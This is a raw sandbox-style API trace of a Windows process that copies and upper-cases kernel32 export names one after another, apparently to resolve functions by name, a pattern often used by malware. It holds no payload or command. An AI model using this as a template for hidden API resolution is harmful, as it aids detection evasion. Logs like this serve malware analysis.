[0076.574] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.574] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.574] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.574] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.574] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.574] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.574] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.574] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.574] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.575] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.575] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.575] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.575] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.575] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.575] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.575] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.575] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.575] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.575] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.575] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.575] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.575] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.575] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.575] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.575] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.575] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.576] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.576] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.576] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.576] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.576] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.576] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.576] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.576] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.576] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.576] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.576] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.576] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.576] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.576] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.576] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.576] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.576] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.577] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.577] lstrlenA (lpString="BEEP") returned 4 [0076.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.577] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.577] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.577] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.577] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.577] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.578] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.578] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.578] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.578] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.578] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.578] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.578] lstrlenA (lpString="CANCELIO") returned 8 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.578] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.578] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.578] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.578] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.578] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.578] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.578] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.578] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.578] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.578] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.579] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.579] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.579] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.579] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.579] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.579] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.579] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.579] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.579] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.579] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.579] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.579] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.579] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.579] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.579] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.579] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.579] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.580] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.580] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.580] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.580] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.580] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.580] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.580] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.580] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.580] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.580] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.580] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.580] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.580] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.580] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.580] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.580] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.580] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.580] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.581] lstrlenA (lpString="COPYFILEA") returned 9 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.581] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.581] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.581] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.581] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.581] lstrlenA (lpString="COPYFILEW") returned 9 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.581] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.581] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.581] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.581] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.581] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.581] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.581] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.581] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.581] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.581] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.581] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.582] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.582] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.582] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.582] lstrlenA (lpString="CREATEEVENTEXW") returned 14 